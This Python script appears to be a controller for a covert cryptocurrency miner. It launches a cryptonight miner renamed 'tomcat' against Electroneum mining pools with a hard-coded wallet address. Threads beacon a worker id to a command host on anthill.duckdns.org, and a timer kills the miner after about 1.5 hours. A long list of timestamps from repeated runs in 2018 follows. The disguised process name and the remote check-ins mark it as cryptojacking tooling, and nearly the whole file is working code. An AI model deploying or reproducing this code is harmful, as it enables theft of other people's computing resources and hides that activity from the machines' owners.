import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:06.990262
#2018-02-17 17:28:07.387121
#2018-02-17 19:18:06.547056
#2018-02-17 21:09:03.872234
#2018-02-17 22:53:01.683580
#2018-02-18 00:38:07.128406
#2018-02-18 02:28:07.295642
#2018-02-18 04:15:08.059618
#2018-02-18 06:06:04.746444
#2018-02-18 07:57:01.828590
#2018-02-18 09:44:05.340507
#2018-02-18 11:31:05.839686
#2018-02-18 13:16:07.306736
#2018-02-18 15:07:06.062066
#2018-02-18 16:54:06.240467
#2018-02-18 18:42:02.008100
#2018-02-18 20:28:07.858430
#2018-02-18 22:14:04.918938
#2018-02-19 00:02:05.391879
#2018-02-19 01:47:04.922029
#2018-02-19 03:36:01.535081
#2018-02-19 05:21:07.331117
#2018-02-19 07:07:07.171772
#2018-02-19 08:56:06.281968
#2018-02-19 10:45:08.732857
#2018-02-19 12:34:06.942756
#2018-02-19 14:22:01.740877
#2018-02-19 16:09:01.767949
#2018-02-19 17:57:01.971904
#2018-02-19 19:45:08.413556
#2018-02-19 21:34:05.382314
#2018-02-19 23:20:05.883686
#2018-02-20 01:06:03.730925
#2018-02-20 02:54:06.468199
#2018-02-20 04:43:06.752934
#2018-02-20 06:27:01.246080
#2018-02-20 08:12:04.366833
#2018-02-20 09:57:06.491076
#2018-02-20 11:41:04.927323
#2018-02-20 13:28:08.599204
#2018-02-20 15:14:04.532025
#2018-02-20 16:58:09.546048
#2018-02-20 18:48:11.697535
#2018-02-20 20:38:01.761246
#2018-02-20 22:23:02.195027
#2018-02-21 00:03:05.491698
#2018-02-21 01:49:06.840535
#2018-02-21 03:32:05.194020
#2018-02-21 05:19:06.797467
#2018-02-21 07:07:07.671071
#2018-02-21 08:53:07.507675
#2018-02-21 10:41:02.206808
#2018-02-21 12:28:06.481723
#2018-02-21 14:16:05.281362
#2018-02-21 16:04:08.287203
#2018-02-21 17:55:09.803037
#2018-02-21 19:40:10.281284
#2018-02-21 21:29:01.417716
#2018-02-21 23:16:01.933022
#2018-02-22 01:07:01.318642
#2018-02-22 02:54:06.878491
#2018-02-22 04:41:08.124891
#2018-02-22 06:26:04.118150
#2018-02-22 08:12:03.929572
#2018-02-22 10:01:02.125748
#2018-02-22 11:45:11.129482
#2018-02-22 13:33:06.838537
#2018-02-22 15:21:09.635962
#2018-02-22 17:08:05.151966
#2018-02-22 18:54:08.577214
#2018-02-22 20:47:08.264113
#2018-02-22 22:34:10.658371
#2018-02-23 00:19:05.475351
#2018-02-23 02:09:01.267886
#2018-02-23 03:57:01.309794
#2018-02-23 05:44:01.738322
#2018-02-23 07:33:04.876861
#2018-02-23 09:36:08.389595
#2018-02-23 11:41:03.823236
#2018-02-23 13:31:08.750740
#2018-02-23 15:17:11.004562
#2018-02-23 17:06:07.935640
#2018-02-23 18:36:07.411310
#2018-02-23 20:17:07.871100
#2018-02-23 21:53:04.932100
#2018-02-23 23:27:06.689381
#2018-02-24 01:05:06.038857
#2018-02-24 02:45:04.195630
#2018-02-24 04:23:07.403473
#2018-02-24 05:51:07.418958
#2018-02-24 07:29:01.587610
#2018-02-24 09:02:05.611875
#2018-02-24 10:46:05.355781
#2018-02-24 12:34:01.315998
#2018-02-24 14:22:07.610345
#2018-02-24 16:09:07.312550
#2018-02-24 18:01:05.936622
#2018-02-24 19:49:06.574761
#2018-02-24 21:34:07.430325
#2018-02-25 00:22:05.957893
#2018-02-25 03:30:03.126432
#2018-02-25 07:19:05.011271